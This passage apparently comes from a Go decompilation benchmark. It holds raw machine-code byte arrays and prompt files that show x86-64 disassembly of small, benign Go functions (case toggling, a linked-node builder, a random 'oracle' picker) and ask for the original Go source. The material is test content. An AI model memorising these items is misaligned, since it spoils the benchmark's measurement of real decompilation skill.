137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 198, 68, 36, 24, 0, 72, 141, 13, 177, 200, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 5, 0, 0, 0, 232, 208, 186, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 104, 72, 139, 13, 174, 240, 14, 0, 72, 137, 12, 36, 72, 141, 13, 132, 197, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 0, 0, 0, 0, 72, 141, 13, 45, 199, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 4, 0, 0, 0, 232, 50, 187, 255, 255, 144, 72, 139, 68, 36, 48, 72, 139, 13, 181, 244, 14, 0, 72, 
139, 21, 182, 244, 14, 0, 72, 139, 29, 183, 244, 14, 0, 72, 131, 250, 1, 15, 130, 140, 2, 0, 0, 72, 137, 68, 36, 96, 72, 139, 5, 65, 240, 14, 0, 72, 137, 4, 36, 72, 141, 67, 255, 72, 137, 195, 72, 247, 216, 72, 193, 248, 63, 72, 131, 224, 16, 72, 1, 200, 72, 137, 68, 36, 8, 72, 141, 66, 255, 72, 137, 68, 36, 16, 72, 137, 92, 36, 24, 232, 64, 206, 255, 255, 72, 139, 68, 36, 96, 72, 139, 0, 72, 133, 192, 15, 133, 18, 2, 0, 0, 232, 90, 118, 254, 255, 72, 139, 68, 36, 8, 72, 139, 12, 36, 72, 15, 186, 225, 63, 15, 131, 235, 1, 0, 0, 72, 137, 200, 72, 209, 225, 72, 193, 233, 31, 72, 186, 128, 127, 177, 215, 13, 0, 0, 0, 72, 1, 209, 72, 139, 21, 208, 239, 14, 0, 72, 137, 20, 36, 72, 105, 201, 0, 202, 154, 59, 72, 37, 255, 255, 255, 63, 72, 99, 192, 72, 1, 200, 72, 185, 0, 0, 26, 61, 235, 3, 178, 161, 72, 1, 200, 72, 137, 68, 36, 8, 232, 234, 222, 255, 255, 199, 4, 36, 8, 0, 0, 0, 72, 141, 5, 4, 65, 4, 0, 72, 137, 68, 36, 8, 72, 139, 68, 36, 112, 72, 137, 68, 36, 16, 232, 40, 168, 248, 255, 72, 139, 68, 36, 88, 72, 139, 0, 72, 139, 76, 36, 120, 72, 139, 9, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 90, 251, 255, 255, 72, 139, 68, 36, 16, 72, 137, 132, 36, 136, 0, 0, 0, 72, 137, 4, 36, 232, 36, 245, 255, 255, 72, 139, 68, 36, 112, 72, 139, 140, 36, 136, 0, 0, 0, 49, 210, 235, 28, 72, 139, 92, 36, 80, 72, 141, 83, 1, 72, 139, 92, 36, 112, 72, 139, 180, 36, 136, 0, 0, 0, 72, 137, 216, 72, 137, 241, 72, 137, 84, 36, 80, 72, 139, 24, 72, 133, 219, 15, 133, 221, 0, 0, 0, 72, 137, 12, 36, 232, 189, 245, 255, 255, 72, 139, 68, 36, 104, 128, 56, 0, 117, 192, 72, 139, 76, 36, 80, 72, 133, 201, 117, 44, 72, 139, 132, 36, 136, 0, 0, 0, 72, 137, 4, 36, 232, 232, 242, 255, 255, 72, 139, 132, 36, 128, 0, 0, 0, 72, 139, 8, 72, 137, 12, 36, 232, 180, 222, 249, 255, 72, 139, 68, 36, 104, 235, 138, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 72, 8, 72, 255, 201, 72, 137, 12, 36, 232, 5, 5, 246, 255, 72, 139, 68, 36, 8, 15, 87, 192, 15, 17, 132, 36, 144, 0, 0, 0, 72, 141, 13, 14, 68, 1, 0, 72, 
137, 140, 36, 144, 0, 0, 0, 72, 137, 132, 36, 152, 0, 0, 0, 72, 139, 5, 151, 238, 14, 0, 72, 141, 21, 144, 138, 5, 0, 72, 137, 20, 36, 72, 137, 68, 36, 8, 72, 141, 5, 2, 198, 3, 0, 72, 137, 68, 36, 16, 72, 199, 68, 36, 24, 5, 0, 0, 0, 72, 141, 156, 36, 144, 0, 0, 0, 72, 137, 92, 36, 32, 72, 199, 68, 36, 40, 1, 0, 0, 0, 72, 199, 68, 36, 48, 1, 0, 0, 0, 232, 46, 8, 255, 255, 233, 64, 255, 255, 255, 72, 57, 218, 15, 130, 26, 255, 255, 255, 72, 139, 68, 36, 104, 128, 56, 0, 117, 16, 72, 139, 172, 36, 160, 0, 0, 0, 72, 129, 196, 168, 0, 0, 0, 195, 72, 137, 12, 36, 232, 13, 242, 255, 255, 235, 229, 72, 137, 194, 72, 137, 200, 72, 137, 209, 233, 30, 254, 255, 255, 144, 72, 139, 13, 237, 237, 14, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 232, 39, 221, 255, 255, 233, 56, 254, 255, 255, 72, 141, 5, 43, 199, 3, 0, 232, 54, 213, 250, 255, 233, 134, 251, 255, 255, 184, 1, 0, 0, 0, 72, 137, 209, 232, 244, 222, 250, 255, 49, 192, 232, 141, 222, 250, 255, 232, 23, 183, 250, 255, 233, 2, 251, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/disasm/oracle_predict_2021.txt: -------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 68, 36, 240, 72, 59, 65, 16, 15, 134, 29, 2, 0, 0, 72, 129, 236, 144, 0, 0, 0, 72, 137, 172, 36, 136, 0, 0, 0, 72, 141, 172, 36, 136, 0, 0, 0, 72, 139, 132, 36, 160, 0, 0, 0, 72, 133, 192, 15, 142, 224, 1, 0, 0, 72, 139, 140, 36, 152, 0, 0, 0, 49, 210, 187, 239, 190, 237, 254, 235, 111, 77, 99, 201, 76, 1, 203, 73, 57, 240, 125, 88, 70, 15, 182, 12, 7, 65, 129, 249, 128, 0, 0, 0, 125, 5, 73, 255, 192, 235, 226, 72, 137, 92, 36, 72, 72, 137, 60, 36, 72, 137, 116, 36, 8, 76, 137, 68, 36, 16, 232, 201, 168, 251, 255, 68, 139, 76, 36, 24, 76, 139, 68, 36, 32, 72, 139, 132, 36, 160, 0, 0, 0, 72, 139, 76, 36, 96, 72, 139, 84, 36, 80, 72, 139, 92, 36, 72, 72, 139, 116, 36, 64, 72, 139, 124, 36, 88, 235, 157, 72, 255, 194, 72, 57, 
194, 125, 39, 72, 131, 193, 16, 72, 137, 76, 36, 96, 72, 137, 84, 36, 80, 72, 139, 113, 8, 72, 137, 116, 36, 64, 72, 139, 57, 72, 137, 124, 36, 88, 69, 49, 192, 233, 116, 255, 255, 255, 72, 137, 92, 36, 80, 72, 139, 5, 65, 156, 13, 0, 72, 137, 4, 36, 72, 137, 92, 36, 8, 232, 51, 240, 255, 255, 232, 206, 243, 255, 255, 72, 139, 4, 36, 72, 139, 76, 36, 80, 72, 1, 200, 72, 139, 13, 83, 51, 13, 0, 72, 133, 201, 15, 132, 17, 1, 0, 0, 72, 153, 72, 247, 249, 72, 137, 84, 36, 72, 15, 87, 192, 15, 17, 68, 36, 120, 72, 141, 13, 217, 44, 1, 0, 72, 137, 76, 36, 120, 72, 141, 29, 189, 246, 4, 0, 72, 137, 156, 36, 128, 0, 0, 0, 72, 139, 29, 246, 155, 13, 0, 72, 141, 53, 87, 13, 5, 0, 72, 137, 52, 36, 72, 137, 92, 36, 8, 72, 141, 92, 36, 120, 72, 137, 92, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 253, 74, 255, 255, 72, 139, 13, 222, 50, 13, 0, 72, 139, 21, 207, 50, 13, 0, 72, 139, 68, 36, 72, 72, 57, 200, 15, 131, 139, 0, 0, 0, 72, 193, 224, 4, 72, 139, 76, 2, 8, 72, 139, 4, 2, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 166, 103, 247, 255, 72, 139, 68, 36, 16, 15, 87, 192, 15, 17, 68, 36, 104, 72, 141, 13, 66, 44, 1, 0, 72, 137, 76, 36, 104, 72, 137, 68, 36, 112, 72, 139, 5, 105, 155, 13, 0, 72, 141, 13, 202, 12, 5, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 72, 141, 68, 36, 104, 72, 137, 68, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 112, 74, 255, 255, 72, 139, 172, 36, 136, 0, 0, 0, 72, 129, 196, 144, 0, 0, 0, 195, 187, 239, 190, 237, 254, 233, 185, 254, 255, 255, 232, 113, 24, 252, 255, 232, 220, 95, 249, 255, 144, 232, 246, 240, 251, 255, 233, 193, 253, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/prompts/baby_go_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(): 4 | MOV RCX,qword ptr FS:[-0x8] 5 | LEA RAX,[RSP + -0xf0] 6 | CMP RAX,qword ptr [RCX + 0x10] 
7 | JBE LAB_004901d0 8 | SUB RSP,0x170 9 | MOV qword ptr [RSP + 0x168],RBP 10 | LEA RBP,[RSP + 0x168] 11 | MOV RAX,qword ptr [os.Stdin] 12 | MOV qword ptr [RSP + 0x90],RAX 13 | NOP 14 | MOV qword ptr [RSP + 0x110],0x0 15 | LEA RDI,[RSP + 0x118] 16 | XORPS XMM0,XMM0 17 | LEA RDI,[RDI + -0x30] 18 | MOV qword ptr [RSP + -0x10],RBP 19 | LEA RBP,[RSP + -0x10] 20 | CALL FUN_004540d5 21 | MOV RBP,qword ptr [RBP] 22 | LEA RCX,[0x4a2600] 23 | MOV qword ptr [RSP],RCX 24 | MOV qword ptr [RSP + 0x8],0x1000 25 | MOV qword ptr [RSP + 0x10],0x1000 26 | CALL runtime.makeslice 27 | MOV RAX,qword ptr [RSP + 0x18] 28 | MOV qword ptr [RSP + 0xb8],0x0 29 | LEA RDI,[RSP + 0xc0] 30 | XORPS XMM0,XMM0 31 | LEA RDI,[RDI + -0x30] 32 | MOV qword ptr [RSP + -0x10],RBP 33 | LEA RBP,[RSP + -0x10] 34 | CALL FUN_004540d5 35 | MOV RBP,qword ptr [RBP] 36 | MOV qword ptr [RSP + 0xb8],RAX 37 | MOV qword ptr [RSP + 0xc0],0x1000 38 | MOV qword ptr [RSP + 0xc8],0x1000 39 | LEA RAX,[0x4df8e0] 40 | MOV qword ptr [RSP + 0xd0],RAX 41 | MOV RAX,qword ptr [RSP + 0x90] 42 | MOV qword ptr [RSP + 0xd8],RAX 43 | MOV qword ptr [RSP + 0x100],-0x1 44 | MOV qword ptr [RSP + 0x108],-0x1 45 | MOV RAX,qword ptr [RSP + 0xb8] 46 | MOV qword ptr [RSP + 0x110],RAX 47 | LEA RDI,[RSP + 0x118] 48 | LEA RSI,[RSP + 0xc0] 49 | MOV qword ptr [RSP + -0x10],RBP 50 | LEA RBP,[RSP + -0x10] 51 | CALL FUN_0045443a 52 | MOV RBP,qword ptr [RBP] 53 | XORPS XMM1,XMM1 54 | MOVUPS xmmword ptr [RSP + 0xa8],XMM1 55 | LEA RAX,[0x4a24c0] 56 | MOV qword ptr [RSP + 0xa8],RAX 57 | LEA RCX,[0x4de1e0] 58 | MOV qword ptr [RSP + 0xb0],RCX 59 | MOV RCX,qword ptr [os.Stdout] 60 | LEA RDX,[0x4df900] 61 | MOV qword ptr [RSP],RDX 62 | MOV qword ptr [RSP + 0x8],RCX 63 | LEA RCX,[RSP + 0xa8] 64 | MOV qword ptr [RSP + 0x10],RCX 65 | MOV qword ptr [RSP + 0x18],0x1 66 | MOV qword ptr [RSP + 0x20],0x1 67 | CALL fmt.Fprint 68 | NOP 69 | LEA RAX,[RSP + 0x110] 70 | MOV qword ptr [RSP],RAX 71 | MOV byte ptr [RSP + 0x8],0xa 72 | CALL bufio.(*Reader).ReadBytes 73 | MOV 
RAX,qword ptr [RSP + 0x18] 74 | MOV RCX,qword ptr [RSP + 0x10] 75 | MOV RDX,qword ptr [RSP + 0x20] 76 | LEA RBX,[RSP + 0x60] 77 | MOV qword ptr [RSP],RBX 78 | MOV qword ptr [RSP + 0x8],RCX 79 | MOV qword ptr [RSP + 0x10],RAX 80 | MOV qword ptr [RSP + 0x18],RDX 81 | CALL runtime.slicebytetostring 82 | MOV RAX,qword ptr [RSP + 0x20] 83 | MOV qword ptr [RSP + 0x88],RAX 84 | MOV RCX,qword ptr [RSP + 0x28] 85 | MOV qword ptr [RSP + 0x50],RCX 86 | XOR EDX,EDX 87 | JMP LAB_004900a6 88 | LAB_00490024: 89 | MOV qword ptr [RSP],RCX 90 | MOV qword ptr [RSP + 0x8],RAX 91 | CALL runtime.convTstring 92 | MOV RAX,qword ptr [RSP + 0x10] 93 | XORPS XMM0,XMM0 94 | MOVUPS xmmword ptr [RSP + 0x98],XMM0 95 | LEA RCX,[0x4a24c0] 96 | MOV qword ptr [RSP + 0x98],RCX 97 | MOV qword ptr [RSP + 0xa0],RAX 98 | MOV RAX,qword ptr [os.Stdout] 99 | LEA RDX,[0x4df900] 100 | MOV qword ptr [RSP],RDX 101 | MOV qword ptr [RSP + 0x8],RAX 102 | LEA RAX,[RSP + 0x98] 103 | MOV qword ptr [RSP + 0x10],RAX 104 | MOV qword ptr [RSP + 0x18],0x1 105 | MOV qword ptr [RSP + 0x20],0x1 106 | CALL fmt.Fprint 107 | MOV RAX,qword ptr [RSP + 0x88] 108 | MOV RCX,qword ptr [RSP + 0x50] 109 | MOV RDX,qword ptr [RSP + 0x58] 110 | LAB_004900a6: 111 | CMP RDX,RCX 112 | JGE LAB_004901c0 113 | MOVZX EBX,byte ptr [RAX + RDX*0x1] 114 | CMP EBX,0x80 115 | JGE LAB_0049019f 116 | INC RDX 117 | LAB_004900c2: 118 | MOV dword ptr [RSP + 0x44],EBX 119 | MOV qword ptr [RSP + 0x58],RDX 120 | MOV qword ptr [RSP],0x0 121 | MOVSXD RAX,EBX 122 | MOV qword ptr [RSP + 0x8],RAX 123 | CALL runtime.intstring 124 | MOV RAX,qword ptr [RSP + 0x10] 125 | MOV RCX,qword ptr [RSP + 0x18] 126 | MOV EDX,dword ptr [RSP + 0x44] 127 | BT EDX,0x0 128 | JC LAB_00490191 129 | CMP EDX,0xff 130 | JA LAB_00490155 131 | MOVZX EDX,DL 132 | LEA RBX,[0x553f00] 133 | MOVZX EDX,byte ptr [RDX + RBX*0x1] 134 | AND EDX,0x60 135 | CMP DL,0x20 136 | SETZ DL 137 | LAB_00490117: 138 | TEST DL,DL 139 | JZ LAB_00490138 140 | MOV qword ptr [RSP],RAX 141 | MOV qword ptr [RSP + 
0x8],RCX 142 | CALL strings.ToLower 143 | MOV RAX,qword ptr [RSP + 0x18] 144 | MOV RCX,qword ptr [RSP + 0x10] 145 | JMP LAB_00490024 146 | LAB_00490138: 147 | MOV qword ptr [RSP],RAX 148 | MOV qword ptr [RSP + 0x8],RCX 149 | CALL strings.ToUpper 150 | MOV RCX,qword ptr [RSP + 0x10] 151 | MOV RAX,qword ptr [RSP + 0x18] 152 | JMP LAB_00490024 153 | LAB_00490155: 154 | MOV qword ptr [RSP + 0x80],RAX 155 | MOV qword ptr [RSP + 0x48],RCX 156 | MOV RAX,qword ptr [unicode.Upper] 157 | MOV qword ptr [RSP],RAX 158 | MOV dword ptr [RSP + 0x8],EDX 159 | CALL unicode.isExcludingLatin 160 | MOVZX EDX,byte ptr [RSP + 0x10] 161 | MOV RAX,qword ptr [RSP + 0x80] 162 | MOV RCX,qword ptr [RSP + 0x48] 163 | LEA RBX,[0x553f00] 164 | JMP LAB_00490117 165 | LAB_00490191: 166 | MOV RDX,RAX 167 | MOV RAX,RCX 168 | MOV RCX,RDX 169 | JMP LAB_00490024 170 | LAB_0049019f: 171 | MOV qword ptr [RSP],RAX 172 | MOV qword ptr [RSP + 0x8],RCX 173 | MOV qword ptr [RSP + 0x10],RDX 174 | CALL runtime.decoderune 175 | MOV EBX,dword ptr [RSP + 0x18] 176 | MOV RDX,qword ptr [RSP + 0x20] 177 | JMP LAB_004900c2 178 | LAB_004901c0: 179 | MOV RBP,qword ptr [RSP + 0x168] 180 | ADD RSP,0x170 181 | RET 182 | LAB_004901d0: 183 | CALL runtime.morestack_noctxt 184 | JMP funcA 185 | //end of function funcA 186 | 187 | Reference Table: 188 | Address Data 189 | 00565be8 undefined8 ?? 190 | 004a2600 ?? 01h 191 | 004a2600 ?? 01h 192 | 004df8e0 undefined1[32] 193 | 004df8e0 undefined1[32] 194 | 004a24c0 ?? 10h 195 | 004a24c0 ?? 10h 196 | 004de1e0 addr 004c6ead 197 | 004de1e0 addr 004c6ead 198 | 00565bf0 undefined8 ?? 199 | 004df900 undefined1[32] 200 | 004df900 undefined1[32] 201 | 004a24c0 ?? 10h 202 | 004a24c0 ?? 10h 203 | 00565bf0 undefined8 ?? 
204 | 004df900 undefined1[32] 205 | 004df900 undefined1[32] 206 | 00553f00 undefined1[256] 207 | 00553f00 undefined1[256] 208 | 0055f1c0 addr 005609a0 209 | 005609a0 addr 00556bc0 210 | 00553f00 undefined1[256] 211 | 212 | Generate just the Go code for the function that produced the above x86 64-bit assembly. The Go code should only represent the funcA function. The Go code is idiomatic and uses standard libraries and channels. -------------------------------------------------------------------------------- /eval/go_corpus/prompts/cartree_main_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(): 4 | MOV RCX,qword ptr FS:[-0x8] 5 | LEA RAX,[RSP + -0x10] 6 | CMP RAX,qword ptr [RCX + 0x10] 7 | JBE LAB_0049b9f7 8 | SUB RSP,0x90 9 | MOV qword ptr [RSP + 0x88],RBP 10 | LEA RBP,[RSP + 0x88] 11 | LEA RAX,[0x4ad080] 12 | MOV qword ptr [RSP],RAX 13 | CALL runtime.newobject 14 | MOV RAX,qword ptr [RSP + 0x8] 15 | MOV qword ptr [RSP + 0x70],RAX 16 | XOR ECX,ECX 17 | XOR EDX,EDX 18 | JMP LAB_0049b80e 19 | LAB_0049b742: 20 | MOV RCX,qword ptr [RCX] 21 | LAB_0049b745: 22 | TEST RCX,RCX 23 | JZ LAB_0049b756 24 | MOV RDX,qword ptr [RAX] 25 | CMP qword ptr [RCX + 0x18],RDX 26 | JG LAB_0049b742 27 | TEST RCX,RCX 28 | LAB_0049b756: 29 | JZ LAB_0049b914 30 | MOV qword ptr [RSP + 0x50],RCX 31 | MOV RDX,qword ptr [RAX] 32 | MOV qword ptr [RSP + 0x48],RDX 33 | MOV RBX,qword ptr [RCX + 0x10] 34 | MOV qword ptr [RSP + 0x58],RBX 35 | LEA RSI,[0x4c1f20] 36 | MOV qword ptr [RSP],RSI 37 | CALL runtime.newobject 38 | MOV RDI,qword ptr [RSP + 0x8] 39 | MOV RAX,qword ptr [RSP + 0x48] 40 | MOV qword ptr [RDI + 0x18],RAX 41 | NOP 42 | CMP dword ptr [runtime.writeBarrier],0x0 43 | JNZ LAB_0049b8f2 44 | MOV RCX,qword ptr [RSP + 0x58] 45 | MOV qword ptr [RDI + 0x8],RCX 46 | LAB_0049b7a7: 47 | TEST RCX,RCX 48 | JZ LAB_0049b7bc 49 | CMP dword ptr [runtime.writeBarrier],0x0 50 | JNZ LAB_0049b8df 51 | MOV qword ptr 
[RCX],RDI 52 | LAB_0049b7bc: 53 | NOP 54 | CMP dword ptr [runtime.writeBarrier],0x0 55 | JNZ LAB_0049b8c3 56 | MOV qword ptr [RDI + 0x10],0x0 57 | LAB_0049b7d2: 58 | NOP 59 | CMP dword ptr [runtime.writeBarrier],0x0 60 | JNZ LAB_0049b8a4 61 | MOV RAX,qword ptr [RSP + 0x50] 62 | MOV qword ptr [RAX + 0x10],RDI 63 | LAB_0049b7e9: 64 | TEST RDI,RDI 65 | JZ LAB_0049b7fe 66 | CMP dword ptr [runtime.writeBarrier],0x0 67 | JNZ LAB_0049b89a 68 | MOV qword ptr [RDI],RAX 69 | LAB_0049b7fe: 70 | MOV RAX,qword ptr [RSP + 0x60] 71 | LAB_0049b803: 72 | MOV RCX,RDI 73 | MOV RDX,RAX 74 | MOV RAX,qword ptr [RSP + 0x70] 75 | LAB_0049b80e: 76 | MOV qword ptr [RSP + 0x60],RDX 77 | MOV qword ptr [RSP + 0x68],RCX 78 | XORPS XMM0,XMM0 79 | MOVUPS xmmword ptr [RSP + 0x78],XMM0 80 | LEA RBX,[0x4a7ce0] 81 | MOV qword ptr [RSP + 0x78],RBX 82 | MOV qword ptr [RSP + 0x80],RAX 83 | MOV RSI,qword ptr [os.Stdin] 84 | LEA RDI,[0x4ed0c0] 85 | MOV qword ptr [RSP],RDI 86 | MOV qword ptr [RSP + 0x8],RSI 87 | LEA RSI,[RSP + 0x78] 88 | MOV qword ptr [RSP + 0x10],RSI 89 | MOV qword ptr [RSP + 0x18],0x1 90 | MOV qword ptr [RSP + 0x20],0x1 91 | CALL fmt.Fscan 92 | MOV RAX,qword ptr [RSP + 0x30] 93 | CMP RAX,0x0 94 | CMP qword ptr [RSP + 0x28],0x1 95 | JNZ LAB_0049b9ab 96 | CMP RAX,0x0 97 | JNZ LAB_0049b9ab 98 | MOV RAX,qword ptr [RSP + 0x70] 99 | MOV RCX,qword ptr [RSP + 0x68] 100 | JMP LAB_0049b745 101 | LAB_0049b89a: 102 | CALL runtime.gcWriteBarrier 103 | JMP LAB_0049b7fe 104 | LAB_0049b8a4: 105 | MOV RCX,qword ptr [RSP + 0x50] 106 | LEA RDX,[RCX + 0x10] 107 | MOV RAX,RDI 108 | MOV RDI,RDX 109 | CALL runtime.gcWriteBarrier 110 | MOV RDI,RAX 111 | MOV RAX,RCX 112 | JMP LAB_0049b7e9 113 | LAB_0049b8c3: 114 | LEA RCX,[RDI + 0x10] 115 | MOV RAX,RDI 116 | MOV RDI,RCX 117 | MOV RDX,RAX 118 | XOR EAX,EAX 119 | CALL runtime.gcWriteBarrier 120 | MOV RDI,RDX 121 | JMP LAB_0049b7d2 122 | LAB_0049b8df: 123 | MOV RAX,RDI 124 | MOV RDI,RCX 125 | CALL runtime.gcWriteBarrier 126 | MOV RDI,RAX 127 | JMP LAB_0049b7bc 128 
| LAB_0049b8f2: 129 | LEA RDX,[RDI + 0x8] 130 | MOV RAX,RDI 131 | MOV RDI,RDX 132 | MOV RCX,RAX 133 | MOV RAX,qword ptr [RSP + 0x58] 134 | CALL runtime.gcWriteBarrier 135 | MOV RDI,RCX 136 | MOV RCX,RAX 137 | JMP LAB_0049b7a7 138 | LAB_0049b914: 139 | MOV RCX,qword ptr [RAX] 140 | MOV qword ptr [RSP + 0x40],RCX 141 | LEA RDX,[0x4c1f20] 142 | MOV qword ptr [RSP],RDX 143 | CALL runtime.newobject 144 | MOV RAX,qword ptr [RSP + 0x8] 145 | MOV RCX,qword ptr [RSP + 0x40] 146 | MOV qword ptr [RAX + 0x18],RCX 147 | NOP 148 | CMP dword ptr [runtime.writeBarrier],0x0 149 | JNZ LAB_0049b992 150 | MOV RDI,qword ptr [RSP + 0x60] 151 | MOV qword ptr [RAX + 0x8],RDI 152 | LAB_0049b94d: 153 | TEST RDI,RDI 154 | JZ LAB_0049b95e 155 | CMP dword ptr [runtime.writeBarrier],0x0 156 | JNZ LAB_0049b98b 157 | MOV qword ptr [RDI],RAX 158 | LAB_0049b95e: 159 | NOP 160 | CMP dword ptr [runtime.writeBarrier],0x0 161 | JNZ LAB_0049b978 162 | MOV qword ptr [RAX + 0x10],0x0 163 | LAB_0049b970: 164 | MOV RDI,RAX 165 | JMP LAB_0049b803 166 | LAB_0049b978: 167 | LEA RDI,[RAX + 0x10] 168 | MOV RCX,RAX 169 | XOR EAX,EAX 170 | CALL runtime.gcWriteBarrier 171 | MOV RAX,RCX 172 | JMP LAB_0049b970 173 | LAB_0049b98b: 174 | CALL runtime.gcWriteBarrier 175 | JMP LAB_0049b95e 176 | LAB_0049b992: 177 | LEA RDI,[RAX + 0x8] 178 | MOV RCX,RAX 179 | MOV RAX,qword ptr [RSP + 0x60] 180 | CALL runtime.gcWriteBarrier 181 | MOV RDI,RAX 182 | MOV RAX,RCX 183 | JMP LAB_0049b94d 184 | LAB_0049b9ab: 185 | MOV RAX,qword ptr [RSP + 0x60] 186 | MOV qword ptr [RSP],RAX 187 | CALL main.(*Node).Dump 188 | NOP 189 | MOV RAX,qword ptr [os.Stdout] 190 | LEA RCX,[0x4ed0e0] 191 | MOV qword ptr [RSP],RCX 192 | MOV qword ptr [RSP + 0x8],RAX 193 | MOV qword ptr [RSP + 0x10],0x0 194 | XORPS XMM0,XMM0 195 | MOVUPS xmmword ptr [RSP + 0x18],XMM0 196 | CALL fmt.Fprintln 197 | MOV RBP,qword ptr [RSP + 0x88] 198 | ADD RSP,0x90 199 | RET 200 | LAB_0049b9f7: 201 | CALL runtime.morestack_noctxt 202 | JMP funcB 203 | //end of function funcB 204 
| 205 | Reference Table: 206 | Address Data 207 | 004ad080 ?? 08h 208 | 004ad080 ?? 08h 209 | 004c1f20 ?? 20h 210 | 004c1f20 ?? 20h 211 | 00594ec0 undefined4 ?? 212 | 00594ec0 undefined4 ?? 213 | 00594ec0 undefined4 ?? 214 | 00594ec0 undefined4 ?? 215 | 00594ec0 undefined4 ?? 216 | 004a7ce0 ?? 08h 217 | 004a7ce0 ?? 08h 218 | 005794c8 undefined8 ?? 219 | 004ed0c0 undefined1[32] 220 | 004ed0c0 undefined1[32] 221 | 004c1f20 ?? 20h 222 | 004c1f20 ?? 20h 223 | 00594ec0 undefined4 ?? 224 | 00594ec0 undefined4 ?? 225 | 00594ec0 undefined4 ?? 226 | 005794d0 undefined8 ?? 227 | 004ed0e0 undefined1[32] 228 | 004ed0e0 undefined1[32] 229 | 230 | Generate just the Go code for the function that produced the above x86 64-bit assembly. The Go code should only represent the funcB function. The Go code is idiomatic and uses standard libraries and channels. -------------------------------------------------------------------------------- /eval/go_corpus/prompts/oracle_predict_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcD(undefined param_1, undefined param_2, undefined param_3, undefined param_4, undefined param_5, undefined param_6, undefined8 param_7, undefined8 param_8): 4 | MOV RCX,qword ptr FS:[-0x8] 5 | LEA RAX,[RSP + -0x10] 6 | CMP RAX,qword ptr [RCX + 0x10] 7 | JBE LAB_00492bc5 8 | SUB RSP,0x90 9 | MOV qword ptr [RSP + 0x88],RBP 10 | LEA RBP,[RSP + 0x88] 11 | MOV RAX,qword ptr [RSP + 0xa0] 12 | TEST RAX,RAX 13 | JLE LAB_00492bb0 14 | MOV RCX,qword ptr [RSP + 0x98] 15 | XOR EDX,EDX 16 | MOV EBX,0xfeedbeef 17 | JMP LAB_00492a50 18 | LAB_004929e1: 19 | MOVSXD R9,R9D 20 | ADD RBX,R9 21 | LAB_004929e7: 22 | CMP R8,RSI 23 | JGE LAB_00492a44 24 | MOVZX R9D,byte ptr [RDI + R8*0x1] 25 | CMP R9D,0x80 26 | JGE LAB_004929ff 27 | INC R8 28 | JMP LAB_004929e1 29 | LAB_004929ff: 30 | MOV qword ptr [RSP + 0x48],RBX 31 | MOV qword ptr [RSP],RDI 32 | MOV qword ptr [RSP + 0x8],RSI 33 | MOV qword ptr [RSP + 
0x10],R8 34 | CALL runtime.decoderune 35 | MOV R9D,dword ptr [RSP + 0x18] 36 | MOV R8,qword ptr [RSP + 0x20] 37 | MOV RAX,qword ptr [RSP + 0xa0] 38 | MOV RCX,qword ptr [RSP + 0x60] 39 | MOV RDX,qword ptr [RSP + 0x50] 40 | MOV RBX,qword ptr [RSP + 0x48] 41 | MOV RSI,qword ptr [RSP + 0x40] 42 | MOV RDI,qword ptr [RSP + 0x58] 43 | JMP LAB_004929e1 44 | LAB_00492a44: 45 | INC RDX 46 | CMP RDX,RAX 47 | JGE LAB_00492a73 48 | ADD RCX,0x10 49 | LAB_00492a50: 50 | MOV qword ptr [RSP + 0x60],RCX 51 | MOV qword ptr [RSP + 0x50],RDX 52 | MOV RSI,qword ptr [RCX + 0x8] 53 | MOV qword ptr [RSP + 0x40],RSI 54 | MOV RDI,qword ptr [RCX] 55 | MOV qword ptr [RSP + 0x58],RDI 56 | XOR R8D,R8D 57 | JMP LAB_004929e7 58 | LAB_00492a73: 59 | MOV qword ptr [RSP + 0x50],RBX 60 | MOV RAX,qword ptr [math/rand.globalRand] 61 | MOV qword ptr [RSP],RAX 62 | MOV qword ptr [RSP + 0x8],RBX 63 | CALL math/rand.(*Rand).Seed 64 | CALL math/rand.Int 65 | MOV RAX,qword ptr [RSP] 66 | MOV RCX,qword ptr [RSP + 0x50] 67 | ADD RAX,RCX 68 | MOV RCX,qword ptr [DAT_00565df8] 69 | TEST RCX,RCX 70 | JZ LAB_00492bbf 71 | CQO 72 | IDIV RCX 73 | MOV qword ptr [RSP + 0x48],RDX 74 | XORPS XMM0,XMM0 75 | MOVUPS xmmword ptr [RSP + 0x78],XMM0 76 | LEA RCX,[0x4a57a0] 77 | MOV qword ptr [RSP + 0x78],RCX 78 | LEA RBX,[0x4e2190] 79 | MOV qword ptr [RSP + 0x80],RBX 80 | MOV RBX,qword ptr [os.Stdout] 81 | LEA RSI,[0x4e3840] 82 | MOV qword ptr [RSP],RSI 83 | MOV qword ptr [RSP + 0x8],RBX 84 | LEA RBX,[RSP + 0x78] 85 | MOV qword ptr [RSP + 0x10],RBX 86 | MOV qword ptr [RSP + 0x18],0x1 87 | MOV qword ptr [RSP + 0x20],0x1 88 | CALL fmt.Fprintln 89 | MOV RCX,qword ptr [DAT_00565df8] 90 | MOV RDX,qword ptr [funcDions] 91 | MOV RAX,qword ptr [RSP + 0x48] 92 | CMP RAX,RCX 93 | JNC LAB_00492bba 94 | SHL RAX,0x4 95 | MOV RCX,qword ptr [RDX + RAX*0x1 + 0x8] 96 | MOV RAX,qword ptr [RDX + RAX*0x1] 97 | MOV qword ptr [RSP],RAX 98 | MOV qword ptr [RSP + 0x8],RCX 